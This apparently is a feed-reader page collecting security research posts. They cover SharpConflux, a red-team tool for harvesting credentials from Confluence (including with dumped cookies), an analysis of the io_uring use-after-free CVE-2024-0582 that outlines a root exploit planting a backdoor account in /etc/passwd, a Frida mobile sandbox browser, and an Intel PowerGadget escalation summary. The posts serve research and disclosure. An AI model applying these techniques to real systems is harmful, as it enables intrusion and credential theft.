Reading view

There are new articles available, click to refresh the page.

Introducing SharpConflux

Today, we are releasing a new tool called SharpConflux, a .NET application built to facilitate Confluence exploration. It allows Red Team operators to easily investigate Confluence instances with the goal of finding credential material and documentation relating to objectives without having to rely on SOCKS proxying.

SharpConflux is available for download from the GitHub repository below:

github GitHub: https://github.com/nettitude/SharpConflux/

Background

Red Team operators typically interact with the target organisation’s network via an in-memory implant supported by a Command and Control (C2) framework such as Fortra’s Cobalt Strike, MDSec’s Nighthawk or Nettitude’s PoshC2. Direct access to the corporate network through a Virtual Private Network (VPN) or graphical access to a Virtual Desktop Infrastructure (VDI) host is unusual, meaning that in order to interact with internal corporate websites, operators must tunnel traffic from their systems to the internal network, through the in-memory implant.

Multiple tooling exists for this purpose such as SharpSocks and Cobalt Strike’s built-in socks command. However, this approach presents two problems:

  • First of all, it is troublesome to setup. While a seasoned operator will be able to do so in minutes, I have yet to know a Red Teamer that enjoys the setup process and the laggy browsing experience. In fact, this tool was created as a result of a recent Red Team exercise during which, none of the operators wanted to have to setup proxying to explore an internal Confluence instance.
  • Secondly, in order to provide a stable and usable experience, it forces operators to set the implant’s beaconing time to a small value (almost always less than 100 milliseconds, and often 0 milliseconds). This significantly increases the number of HTTP requests transmitted over the existing C2 channel, creating abnormal volumes of traffic and therefore, providing detection opportunities. Additionally, this prevents certain in-memory evasion techniques from functioning as expected (e.g. Cobalt Strike’s sleep masks), thus potentially leading to a detection by the Endpoint Detection & Response (EDR) solution in place.

SharpConflux aims to bring Confluence exploration functionality to .NET, in a way that can be reliably and flexibly used through common C2 frameworks.

Confluence Introduction

Confluence is a data sharing platform developed by Atlassian, generally used by organisations as a corporate wiki.

Content is organised in spaces, which are intended to facilitate information sharing between teams (e.g. the IT department) or employees responsible for specific projects. Furthermore, users can setup their own personal spaces, to which they can upload public or private data.

Within these spaces, users can publish and edit web pages and blog posts through a web-based editor, and attach any relevant files to them. Additionally, users can add comments to pages and blog posts.

The diagram below, which has been extracted from Confluence’s support page, better illustrates the structure used by the platform:

The hierarchy of content in Confluence

From a Red Teamer’s perspective, Confluence is particularly useful in two scenarios:

  • During early stages of the operation, as all sorts of credentials can typically be found in Confluence. These may facilitate privilege escalation and lateral movement activities.
  • To discover documentation, hostnames and even credential material relating to the objective systems, which are usually targeted after achieving high levels of privileges and therefore, in late stages of the cyber kill chain.

Confluence Instance Types and Authentication

Atlassian offers three Confluence hosting options to fit different organisation’s requirements:

  • Confluence Cloud instances are maintained by Atlassian and hosted on their own AWS tenants. This is the preferred option for newer Atlassian clients. Confluence Cloud instances are accessed as a subdomain of atlassian.net. For instance, https://companysubdomain.atlassian.net/wiki/.
  • Confluence Server and Confluence Data Center instances are maintained by the relevant organisation and therefore, they are hosted on their servers. This can be completely on-premise, or in any cloud tenant managed by the organisation (e.g. Azure, AWS, GCP). Both instance types are similar but Data Center includes additional features. It should be noted that Atlassian has decided to discontinue Confluence Server and support ended in February 2024. However, it still has plans to support Confluence Data Center for the foreseeable future. These instance types run on TCP port 8090 by default and can typically be accessed through an internal FQDN (e.g. http://myconfluence.internal.local:8090). For the purpose of this tool, Confluence Server and Confluence Data Center are considered equivalent.

Even though a lot of organisations are migrating to Confluence Cloud, a significant proportion of them still use on-premise Confluence instances. In fact, it is not uncommon to find companies that have already made the move to Cloud but still maintain on-premise instances for specific internal projects, platforms or departments.

Certain attributes and API endpoints differ slightly between Cloud and Server / Data Center instances. More importantly, authentication methods are significantly different. SharpConflux has been developed with compatibility in mind, supporting a variety of authentication methods across the different instance types.

The most relevant authentication methods are described below.

Confluence Cloud: Email address + password authentication

Users can authenticate to Confluence Cloud instances using an email address and password combination. Upon browsing https://companysubdomain.atlassian.net/wiki/, unauthenticated users are redirected to https://id.atlassian.com/login, where the following form data is posted:

{
   "username":"EMAILVALUE",
   "password":"PASSWORDVALUE",
   "state":
   {
      "csrfToken":"CSRFTOKENVALUE",
      "anonymousId":"ANONYMOUSIDVALUE"
   },
   "token":"TOKENVALUE"
}

If the provided credentials within the username and password parameters, in addition to the csrfToken and token parameters are correct, the server will return a redirect URI. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

This authentication method is not supported by SharpConflux. From an adversarial perspective, firms very rarely rely on this authentication mechanism, as most will be using SAML SSO authentication for Cloud instances.

Confluence Cloud: Email address + API token

Users can create and manage their own API tokens by visiting https://id.atlassian.com/manage-profile/security/api-tokens:

In order to authenticate, the user’s email address and API token are submitted through the Authentication: Basic header in each HTTP request.

This authentication method is supported by SharpConflux. However, gathering valid API tokens is a rare occurrence.

Confluence Cloud: Third Party and SAML SSO

Confluence Cloud allows users to log in with third party (e.g. Apple, Google, Microsoft, Slack) accounts. Typically, firms will configure Confluence Cloud instances to authenticate through Active Directory Federation Services (ADFS) or Azure AD.

Once the SAML exchange is completed, the server will return a redirect URI to https://id.atlassian.com/login/authorize. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

As of the time of release, this authentication method is not supported by SharpConflux. Whilst this is the most commonly deployed authentication method by organisations relying on Confluence Cloud, it is also frequent for them to enforce Multi-Factor Authentication (MFA), making cookie-based authentication a much more interesting method from an adversarial perspective.

Confluence Cloud: Cookie-based Authentication

If you have managed to dump Confluence Cloud cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid cloud.session.token or tenant.session.token cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Confluence Server / Data Center: Username + password (Basic authentication)

By default, Confluence Server / Data Center installations support username + password authentication through the Authorization: Basic HTTP request header. However, Basic authentication can be disabled by the target organisation through the “Allow basic authentication on API calls” setting:

This authentication method is supported by SharpConflux. From an adversarial perspective, finding a username and password combination for an on-premise Confluence instance is one of the most common scenarios.

Confluence Server / Data Center: Username + password (via form data)

Users can visit the on-premise Confluence website (e.g. http://myconfluence.internal.local:8090) and log in using a valid username and password combination. The following HTTP POST request will be sent as a result:

POST /dologin.action HTTP/1.1
[...]

os_username=USERNAMEVALUE&os_password=PASSWORDVALUE&login=Log+in&os_destination=%2Findex.action

If the provided credentials within the os_username and os_password parameters are correct, the server will set the JSESSIONID session cookie.

This authentication method is supported by SharpConflux. Similarly to the previous method, finding a username and password combination is one of the most common scenarios. Please note that this authentication method will still work even if the “Allow basic authentication on API calls” setting is disabled.

Confluence Server / Data Center: Personal Access Token (PAT)

On Confluence Server / Data Center installations, users are allowed to create and manage their own Personal Access Tokens (PATs), which will match their current permission level. PATs can be created from /plugins/personalaccesstokens/usertokens.action:

In order to authenticate, the PAT is submitted through the Authentication: Bearer header in each HTTP request.

While this authentication method is supported by SharpConflux, it has only been added for completeness and to support edge cases, as I have never come across a PAT.

Confluence Server / Data Center: SSO

Similarly to Confluence Cloud instances, Confluence Server / Data Center variations support authentication through various Identity Providers (IdP) including ADFS, Azure AD, Bitium, Okta, OneLogin and PingIdentity. However, in this case, it is uncommon to find on-premise Confluence instances making use of SSO. For this reason, this authentication method is not supported by SharpConflux as of the time of release.

Confluence Server / Data Center: Cookie-based authentication

If you have managed to dump Confluence Server / Data Center cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid JSESSIONID or seraph.confluence cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Summary

Confluence is the most widely used corporate wiki platform, often storing sensitive data that can largely facilitate privilege escalation and lateral movement activities. Whilst this blog post has not uncovered any new attack techniques, release of SharpConflux aims to help Red Team operators by providing an easy way to interact with all types of Confluence instances.

SharpConflux has been tested against the latest supported versions as of the time of development (Cloud 8.3.2, Data Center 7.19.10 LTS and Data Center 8.3.2). A complete list of features, usage guidelines and examples can be found in the referenced GitHub project.

github GitHub: https://github.com/nettitude/SharpConflux/

 

The post Introducing SharpConflux appeared first on LRQA Nettitude Labs.

Mind the Patch Gap: Exploiting an io_uring Vulnerability in Ubuntu

By Oriol Castejón

Overview

This post discusses a use-after-free vulnerability, CVE-2024-0582, in io_uring in the Linux kernel. Despite the vulnerability being patched in the stable kernel in December 2023, it wasn’t ported to Ubuntu kernels for over two months, making it an easy 0day vector in Ubuntu during that time.

In early January 2024, a Project Zero issue for a recently fixed io_uring use-after-free (UAF) vulnerability (CVE-2024-0582) was made public. It was apparent that the vulnerability allowed an attacker to obtain read and write access to a number of previously freed pages. This seemed to be a very powerful primitive: usually a UAF gets you access to a freed kernel object, not a whole page – or even better, multiple pages. As the Project Zero issue also described, it was clear that this vulnerability should be easily exploitable: if an attacker has total access to free pages, once these pages are returned to a slab cache to be reused, they will be able to modify any contents of any object allocated within these pages. In the more common situation, the attacker can modify only a certain type of object, and possibly only at certain offsets or with certain values.

Moreover, this fact also suggests that a data-only exploit should be possible. In general terms, such an exploit does not rely on modifying the code execution flow, by building for instance a ROP chain or using similar techniques. Instead, it focuses on modifying certain data that ultimately grants the attacker root privileges, such as making read-only files writable by the attacker. This approach makes exploitation more reliable, stable, and allows bypassing some exploit mitigations such as Control-Flow Integrity (CFI), as the instructions executed by the kernel are not altered in any way.

Finally, according to the Project Zero issue, this vulnerability was present in the Linux kernel from versions starting at 6.4 and prior to 6.7. At that moment, Ubuntu 23.10 was running a vulnerable verison of 6.5 (and somewhat later so was Ubuntu 22.04 LTS), so it was a good opportunity to exploit the patch gap, understand how easy it would be for an attacker to do that, and how long they might possess an 0day exploit based on an Nday.

More precisely:

This post describes the data-only exploit strategy that we implemented, allowing a non-privileged user (and without the need of unprivileged user namespaces) to achieve root privileges on affected systems. First, a general overview of the io_uring interface is given, as well as some more specific details of the interface relevant to this vulnerability. Next, an analysis of the vulnerability is provided. Finally, a strategy for a data-only exploit is presented.

Preliminaries

The io_uring interface is an asynchronous I/O API for Linux created by Jens Axboe and introduced in the Linux kernel version 5.1. Its goal is to improve performance of applications with a high number of I/O operations. It provides interfaces similar to functions like read()  and write(), for example, but requests are satisfied in an asynchronous manner to avoid the context switching overhead caused by blocking system calls.

The io_uring interface has been a bountiful target for a lot of vulnerability research; it was disabled in ChromeOS, production Google servers, and restricted in Android. As such, there are many blog posts that explain it with a lot of detail. Some relevant references are the following:

In the next subsections we give an overview of the io_uring interface. We pay special attention to the Provided Buffer Ring functionality, which is relevant to the vulnerability discussed in this post. The reader can also check “What is io_uring?”, as well as the above references for alternative overviews of this subsystem.

The io_uring Interface

The basis of io_uring is a set of two ring buffers used for communication between user and kernel space. These are:

  • The submission queue (SQ), which contains submission queue entries (SQEs) describing a request for an I/O operation, such as reading or writing to a file, etc.
  • The completion queue (CQ), which contains completion queue entries (CQEs) that correspond to SQEs that have been processed and completed.

This model allows executing a number of I/O requests to be performed asynchronously using a single system call, while in a synchronous manner each request would have typically corresponded to a single system call. This reduces the overhead caused by blocking system calls, thus improving performance. Moreover, the use of shared buffers also reduces the overhead as no data between user and kernelspace has to be transferred.

The io_uring API consists of three system calls:

  • io_uring_setup()
  • io_uring_register()
  • io_uring_enter()

The io_uring_setup() System Call

The io_uring_setup() system call sets up a context for an io_uring instance, that is, a submission and a completion queue with the indicated number of entries each one. Its prototype is the following:

				
					int io_uring_setup(u32 entries, struct io_uring_params *p);
				
			

Its arguments are:

  • entries: It determines how many elements the SQ and CQ must have at the minimum.
  • params: It can be used by the application to pass options to the kernel, and by the kernel to pass information to the application about the ring buffers.

On success, the return value of this system call is a file descriptor that can be later used to perform operation on the io_uring instance.

The io_uring_register() System Call

The io_uring_register() system call allows registering resources, such as user buffers, files, etc., for use in an io_uring instance. Registering such resources makes the kernel map them, avoiding future copies to and from userspace, thus improving performance. Its prototype is the following:

				
					int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args);
				
			

Its arguments are:

  • fd: The file io_uring file descriptor returned by the io_uring_setup() system call.
  • opcode: The specific operation to be executed. It can have certain values such as IORING_REGISTER_BUFFERS, to register user buffers, or IORING_UNREGISTER_BUFFERS, to release the previously registered buffers.
  • arg: Arguments passed to the operation being executed. Their type depends on the specific opcode being passed.
  • nr_args: Number of arguments in arg being passed.

On success, the return value of this system call is either zero or a positive value, depending on the opcode used.

Provided Buffer Rings

An application might need to have different types of registered buffers for different I/O requests. Since kernel version 5.7, to facilitate managing these different sets of buffers, io_uring allows the application to register a pool of buffers that are identified by a group ID. This is done using the IORING_REGISTER_PBUF_RING opcode in the io_uring_register() system call.

More precisely, the application starts by allocating a set of buffers that it wants to register. Then, it makes the io_uring_register() system call with opcode IORING_REGISTER_PBUF_RING, specifying a group ID with which these buffers should be associated, a start address of the buffers, the length of each buffer, the number of buffers, and a starting buffer ID. This can be done for multiple sets of buffers, each one having a different group ID.

Finally, when submitting a request, the application can use the IOSQE_BUFFER_SELECT flag and provide the desired group ID to indicate that a provided buffer ring from the corresponding set should be used. When the operation has been completed, the buffer ID of the buffer used for the operation is passed to the application via the corresponding CQE.

Provided buffer rings can be unregistered via the io_uring_register() system call using the IORING_UNREGISTER_PBUF_RING opcode.

User-mapped Provided Buffer Rings

In addition to the buffers allocated by the application, since kernel version 6.4, io_uring allows a user to delegate the allocation of provided buffer rings to the kernel. This is done using the IOU_PBUF_RING_MMAP flag passed as an argument to io_uring_register(). In this case, the application does not need to previously allocate these buffers, and therefore the start address of the buffers does not have to be passed to the system call. Then, after io_uring_register() returns, the application can mmap() the buffers into userspace with the offset set as:

				
					IORING_OFF_PBUF_RING | (bgid >> IORING_OFF_PBUF_SHIFT)
				
			

where bgid is the corresponding group ID. These offsets, as well as others used to mmap() the io_uring data, are defined in include/uapi/linux/io_uring.h:

				
					/*
 * Magic offsets for the application to mmap the data it needs
 */
#define IORING_OFF_SQ_RING			0ULL
#define IORING_OFF_CQ_RING			0x8000000ULL
#define IORING_OFF_SQES				0x10000000ULL
#define IORING_OFF_PBUF_RING		0x80000000ULL
#define IORING_OFF_PBUF_SHIFT		16
#define IORING_OFF_MMAP_MASK		0xf8000000ULL
				
			

The function that handles such an mmap() call is io_uring_mmap():

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/io_uring.c#L3439

static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
	size_t sz = vma->vm_end - vma->vm_start;
	unsigned long pfn;
	void *ptr;

	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
	if (IS_ERR(ptr))
		return PTR_ERR(ptr);

	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}
				
			

Note that remap_pfn_range() ultimately creates a mapping with the VM_PFNMAP flag set, which means that the MM subsystem will treat the base pages as raw page frame number mappings wihout an associated page structure. In particular, the core kernel will not keep reference counts of these pages, and keeping track of it is the responsability of the calling code (in this case, the io_uring subsystem).

The io_uring_enter() System Call

The io_uring_enter() system call is used to initiate and complete I/O using the SQ and CQ that have been previously set up via the io_uring_setup() system call. Its prototype is the following:

				
					int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig);
				
			

Its arguments are:

  • fd: The io_uring file descriptor returned by the io_uring_setup() system call.
  • to_submit: Specifies the number of I/Os to submit from the SQ.
  • flags: A bitmask value that allows specifying certain options, such as IORING_ENTER_GETEVENTS, IORING_ENTER_SQ_WAKEUP, IORING_ENTER_SQ_WAIT, etc.
  • sig: A pointer to a signal mask. If it is not NULL, the system call replaces the current signal mask by the one pointed to by sig, and when events become available in the CQ restores the original signal mask.

Vulnerability

The vulnerability can be triggered when an application registers a provided buffer ring with the IOU_PBUF_RING_MMAP flag. In this case, the kernel allocates the memory for the provided buffer ring, instead of it being done by the application. To access the buffers, the application has to mmap() them to get a virtual mapping. If the application later unregisters the provided buffer ring using the IORING_UNREGISTER_PBUF_RING opcode, the kernel frees this memory and returns it to the page allocator. However, it does not have any mechanism to check whether the memory has been previously unmapped in userspace. If this has not been done, the application has a valid memory mapping to freed pages that can be reallocated by the kernel for other purposes. From this point, reading or writing to these pages will trigger a use-after-free.

The following code blocks show the affected parts of functions relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker. The code corresponds to the Linux kernel version 6.5.3, which corresponds to the version used in the Ubuntu kernel 6.5.0-15-generic.

Registering User-mapped Provided Buffer Rings

The handler of the IORING_REGISTER_PBUF_RING opcode for the io_uring_register() system call is the io_register_pbuf_ring() function, shown in the next listing.

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L537

int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl, *free_bl = NULL;
	int ret;

[1]

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;

[Truncated]

	if (!is_power_of_2(reg.ring_entries))
		return -EINVAL;

[2]

	/* cannot disambiguate full vs empty due to head/tail size */
	if (reg.ring_entries >= 65536)
		return -EINVAL;

	if (unlikely(reg.bgid io_bl)) {
		int ret = io_init_bl_list(ctx);
		if (ret)
			return ret;
	}

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (bl) {
		/* if mapped buffer ring OR classic exists, don't allow */
		if (bl->is_mapped || !list_empty(&bl->buf_list))
			return -EEXIST;
	} else {

[3]

		free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
		if (!bl)
			return -ENOMEM;
	}

[4]

	if (!(reg.flags & IOU_PBUF_RING_MMAP))
		ret = io_pin_pbuf_ring(&reg, bl);
	else
		ret = io_alloc_pbuf_ring(&reg, bl);

[Truncated]

	return ret;
}
				
			

The function starts by copying the provided arguments into an io_uring_buf_reg structure reg [1]. Then, it checks that the desired number of entries is a power of two and is strictly less than 65536 [2]. Note that this implies that the maximum number of allowed entries is 32768.

Next, it checks whether a provided buffer list with the specified group ID reg.bgid exists and, in case it does not, an io_buffer_list structure is allocated and its address is stored in the variable bl [3]. Finally, if the provided arguments have the flag IOU_PBUF_RING_MMAP set, the io_alloc_pbuf_ring() function is called [4], passing in the address of the structure reg, which contains the arguments passed to the system call, and the pointer to the allocated buffer list structure bl.

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L519

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
			      struct io_buffer_list *bl)
{
	gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
	size_t ring_size;
	void *ptr;

[5]

	ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);

[6]

	ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
	if (!ptr)
		return -ENOMEM;

[7]

	bl->buf_ring = ptr;
	bl->is_mapped = 1;
	bl->is_mmap = 1;
	return 0;
}
				
			

The io_alloc_pbuf_ring() function takes the number of ring entries specified in reg->ring_entries and computes the resulting size ring_size by multiplying it by the size of the io_uring_buf_ring structure [5], which is 16 bytes. Then, it requests a number of pages from the page allocator that can fit this size via a call to __get_free_pages() [6]. Note that for the maximum number of allowed ring entries, 32768, ring_size is 524288 and thus the maximum number of 4096-byte pages that can be retrieved is 128. The address of the first page is then stored in the io_buffer_list structure, more precisely in bl->buf_ring [7]. Also, bl->is_mapped and bl->is_mmap are set to 1.

Unregistering Provided Buffer Rings

The handler of the IORING_UNREGISTER_PBUF_RING opcode for the io_uring_register() system call is the io_unregister_pbuf_ring() function, shown in the next listing.

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L601

int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl;

[8]

    if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;
	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
		return -EINVAL;
	if (reg.flags)
		return -EINVAL;

[9]

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (!bl)
		return -ENOENT;
	if (!bl->is_mapped)
		return -EINVAL;

[10]

	__io_remove_buffers(ctx, bl, -1U);
	if (bl->bgid >= BGID_ARRAY) {
		xa_erase(&ctx->io_bl_xa, bl->bgid);
		kfree(bl);
	}
	return 0;
}
				
			

Again, the function starts by copying the provided arguments into a io_uring_buf_reg structure reg [8]. Then, it retrieves the provided buffer list corresponding to the group ID specified in reg.bgid and stores its address in the variable bl [9]. Finally, it passes bl to the function __io_remove_buffers() [10].

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L209

static int __io_remove_buffers(struct io_ring_ctx *ctx,
			       struct io_buffer_list *bl, unsigned nbufs)
{
	unsigned i = 0;

	/* shouldn't happen */
	if (!nbufs)
		return 0;

	if (bl->is_mapped) {
		i = bl->buf_ring->tail - bl->head;
		if (bl->is_mmap) {
			struct page *page;

[11]

			page = virt_to_head_page(bl->buf_ring);
            
[12]

			if (put_page_testzero(page))
				free_compound_page(page);
			bl->buf_ring = NULL;
			bl->is_mmap = 0;
		} else if (bl->buf_nr_pages) {

[Truncated]
				
			

In case the buffer list structure has the is_mapped and is_mmap flags set, which is the case when the buffer ring was registered with the IOU_PBUF_RING_MMAP flag [7], the function reaches [11]. Then, the page structure of the head page corresponding to the virtual address of the buffer ring bl->buf_ring is obtained. Finally, all the pages forming the compound page with head page are freed at [12], thus returning them to the page allocator.

Note that if the provided buffer ring is set up with IOU_PBUF_RING_MMAP, that is, it has been allocated by the kernel and not the application, the userspace application is expected to have previously mmap()ed this memory. Moreover, recall that since the memory mapping was created with the VM_PFNMAP flag, the reference count of the page structure was not modified during this operation. In other words, in the code above there is no way for the kernel to know whether the application has unmapped the memory before freeing it via the call to free_compound_page(). If this has not happened, a use-after-free can be triggered by the application by just reading or writing to this memory.

Exploitation

The exploitation mechanism presented in this post relies on how memory allocation works on Linux, so the reader is expected to have some familiarity with it. As a refresher, we highlight the following facts:

  • The page allocator is in charge of managing memory pages, which are usually 4096 bytes. It keeps lists of free pages of order n, that is, memory chunks of page size multiplied by 2^n. These pages are served in a first-in-first-out basis.
  • The slab allocator sits on top of the buddy allocator and keeps caches of commonly used objects (dedicated caches) or fixed-size objects (generic caches), called slab caches, available for allocation in the kernel. There are several implementations of slab allocators, but for the purpose of this post only the SLUB allocator, the default in modern versions of the kernel, is relevant.
  • Slab caches are formed by multiple slabs, which are sets of one or more contiguous pages of memory. When a slab cache runs out of free slabs, which can happen if a large number of objects of the same type or size are allocated and not freed during a period of time, the operating system allocates a new slab by requesting free pages to the page allocator.

One of such cache slabs is the filp, which contains file structures. A filestructure, shown in the next listing, represents an open file.

				
					// Source: https://elixir.bootlin.com/linux/v6.5.3/source/include/linux/fs.h#L961

struct file {
	union {
		struct llist_node	f_llist;
		struct rcu_head 	f_rcuhead;
		unsigned int 		f_iocb_flags;
	};

	/*
	 * Protects f_ep, f_flags.
	 * Must not be taken from IRQ context.
	 */
	spinlock_t		f_lock;
	fmode_t			f_mode;
	atomic_long_t		f_count;
	struct mutex		f_pos_lock;
	loff_t			f_pos;
	unsigned int		f_flags;
	struct fown_struct	f_owner;
	const struct cred	*f_cred;
	struct file_ra_state	f_ra;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
	const struct file_operations	*f_op;

	u64			f_version;
#ifdef CONFIG_SECURITY
	void			*f_security;
#endif
	/* needed for tty driver, and maybe others */
	void			*private_data;

#ifdef CONFIG_EPOLL
	/* Used by fs/eventpoll.c to link all the hooks to this file */
	struct hlist_head	*f_ep;
#endif /* #ifdef CONFIG_EPOLL */
	struct address_space	*f_mapping;
	errseq_t		f_wb_err;
	errseq_t		f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));	/* lest something weird decides that 2 is OK */
				
			

The most relevant fields for this exploit are the following:

  • f_mode: Determines whether the file is readable or writable.
  • f_pos: Determines the current reading or writing position.
  • f_op: The operations associated with the file. It determines the functions to be executed when certain system calls such as read(), write(), etc., are issued on the file. For files in ext4 filesystems, this is equal to the ext4_file_operations variable.

Strategy for a Data-Only Exploit

The exploit primitive provides an attacker with read and write access to a certain number of free pages that have been returned to the page allocator. By opening a file a large number of times, the attacker can force the exhaustion of all the slabs in the filp cache, so that free pages are requested to the page allocator to create a new slab in this cache. In this case, further allocations of file structures will happen in the pages on which the attacker has read and write access, thus being able to modify them. In particular, for example, by modifying the f_mode field, the attacker can make a file that has been opened with read-only permissions to be writable.

This strategy was implemented to successfully exploit the following versions of Ubuntu:

  • Ubuntu 22.04 Jammy Jellyfish LTS with kernel 6.5.0-15-generic.
  • Ubuntu 22.04 Jammy Jellyfish LTS with kernel 6.5.0-17-generic.
  • Ubuntu 23.10 Mantic Minotaur with kernel 6.5.0-15-generic.
  • Ubuntu 23.10 Mantic Minotaur with kernel 6.5.0-17-generic.

The next subsections give more details on how this strategy can be carried out.

Triggering the Vulnerability

The strategy begins by triggering the vulnerability to obtain read and write access to freed pages. This can be done by executing the following steps:

  • Making an io_uring_setup() system call to set up the io_uring instance.
  • Making an io_uring_register() system call with opcode IORING_REGISTER_PBUF_RING and the IOU_PBUF_RING_MMAP flag, so that the kernel itself allocates the memory for the provided buffer ring.
Registering a provided buffer ring
  • mmap()ing the memory of the provided buffer ring with read and write permissions, using the io_uring file descriptor and the offset IORING_OFF_PBUF_RING.
MMap the buffer ring
  • Unregistering the provided buffer ring by making an io_uring_register()system call with opcode IORING_UNREGISTER_PBUF_RING
Unregistering the buffer ring

At this point, the pages corresponding to the provided buffer ring have been returned to the page allocator, while the attacker still has a valid reference to them.

Spraying File Structures

The next step is spawning a large number of child processes, each one opening the file /etc/passwd many times with read-only permissions. This forces the allocation of corresponding file structures in the kernel.

Spraying file structures

By opening a large number of files, the attacker can force the exhaustion of the slabs in the filp cache. After that, new slabs will be allocated by requesting free pages from the page allocator. At some point, the pages that previously corresponded to the provided buffer ring, and to which the attacker still has read and write access, will be returned by the page allocator.

Requesting free pages from the page allocator

Hence, all of the file structures created after this point will be allocated in the attacker-controlled memory region, giving them the possibility to modify the structures.

Allocating file structures within a controlled page

Note that these child processes have to wait until indicated to proceed in the last stage of the exploit, so that the files are kept open and their corresponding structures are not freed.

Locating a File Structure in Memory

Although the attacker may have access to some slabs belonging to the filp cache, they don’t know where they are within the memory region. To identify these slabs, however, the attacker can search for the ext4_file_operations address at the offset of the file.f_op field within the file structure. When one is found, it can be safely assumed that it corresponds to the file structure of one instance of the previously opened /etc/passwd file.

Note that even when Kernel Address Space Layout Randomization (KASLR) is enabled, to identify the ext4_file_operations address in memory it is only necessary to know the offset of this symbol with respect to the _text symbol, so there is no need for a KASLR bypass. Indeed, given a value val of an unsigned integer found in memory at the corresponding offset, one can safely assume that it is the address of ext4_file_operations if:

  • (val >> 32 & 0xffffffff) == 0xffffffff, i.e. the 32 most significant bits are all 1.
  • (val & 0xfffff) == (ext4_fops_offset & 0xfffff), i.e. the 20 least significant bits of val and ext4_fops_offset, the offset of ext4_file_operations with respect to _text, are the same.

Changing File Permissions and Adding a Backdoor Account

Once a file structure corresponding to the /etc/passwd file is located in the memory region accessible by the attacker, it can be modified at will. In particular, setting the FMODE_WRITE and FMODE_CAN_WRITE flags in the file.f_mode field of the found structure will make the /etc/passwd file writable when using the corresponding file descriptor.

Moreover, setting the file.f_pos field of the found file structure to the current size of the /etc/passwd/ file, the attacker can ensure that any data written to it is appended at the end of the file.

To finish, the attacker can signal all the child processes spawned in the second stage to try to write to the opened /etc/passwd file. While most of all of such attempts will fail, as the file was opened with read-only permissions, the one corresponding to the modified file structure, which has write permissions enabled due to the modification of the file->f_mode field, will succeed.

Conclusion

To sum up, in this post we described a use-after-free vulnerability that was recently disclosed in the io_uring subsystem of the Linux kernel, and a data-only exploit strategy was presented. This strategy proved to be realitvely simple to implement. During our tests it proved to be very reliable and, when it failed, it did not affect the stability of the system. This strategy allowed us to exploit up-to-date versions of Ubuntu during the patch gap window of about two months.

About Exodus Intelligence

Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Mind the Patch Gap: Exploiting an io_uring Vulnerability in Ubuntu appeared first on Exodus Intelligence.

Noia - Simple Mobile Applications Sandbox File Browser Tool


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



Intel PowerGadget 3.6 Local Privilege Escalation

Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair mode
Affected Products: Intel PowerGadget
